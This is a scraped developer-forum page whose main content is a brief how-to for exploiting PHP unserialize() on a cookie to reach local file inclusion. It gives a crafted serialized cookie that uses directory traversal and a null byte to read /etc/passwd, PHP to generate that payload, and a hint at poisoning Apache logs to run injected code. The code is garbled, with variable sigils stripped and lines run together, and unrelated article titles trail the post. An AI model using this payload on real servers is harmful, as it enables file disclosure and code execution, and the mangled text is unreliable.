how to use this bugs unserialize()

简介:  quite obvious, you need to set a cookie like this:user_settings=a:1:{s:4:"lang";s:32:".
 <?php

settings=unserialize(_COOKIE[user_settings]);
include("include/lang/".settings[lang].".php");?>quiteobvious,youneedtosetacookielikethis:usersettings=a:1:s:4:"lang";s:32:"../../../../../../../etc/passwd[nullchar]";itistheresultof:[codelang=php]<?phpsettings=array();
settings[lang]="../../../../../../../etc/passwd/x00";settings=serialize(settings);echosettings;

?>

[/code]

the same with apache logs or something...
where you have injected some php code
目录
打赏
0
0
0
0
680
分享
相关文章
ReferenceError: _dirname is not defined
ReferenceError: _dirname is not defined
103 0
ReferenceError: self is not defined
ReferenceError: self is not defined
553 0
解决Fortify漏洞:Portability Flaw: Locale Dependent Comparison
解决Fortify漏洞:Portability Flaw: Locale Dependent Comparison
288 0
O_RDONLY/O_NOATIME undeclared (first use in this function
O_RDONLY/O_NOATIME undeclared (first use in this function
180 0
O_RDONLY/O_NOATIME undeclared (first use in this function
SipStack.i:321: Error: Unknown SWIG preprocessor directive:
SipStack.i:321: Error: Unknown SWIG preprocessor directive:
88 0
【hacker的错误集】DeprecationWarning: find_element_by_* commands are deprecated.
DeprecationWarning: find_element_by_* commands are deprecated. Please use find_element() instead。依旧是使用单词意思分析报错原因
163 0
【hacker的错误集】DeprecationWarning: find_element_by_* commands are deprecated.
warning C4995: strcat name was marked as #pragma deprecated
warning C4995: strcat name was marked as #pragma deprecated
114 0
BootstrapValidator引发的too much recursion
BootstrapValidator引发的too much recursion
135 0
AI助理

你好,我是AI助理

可以解答问题、推荐解决方案等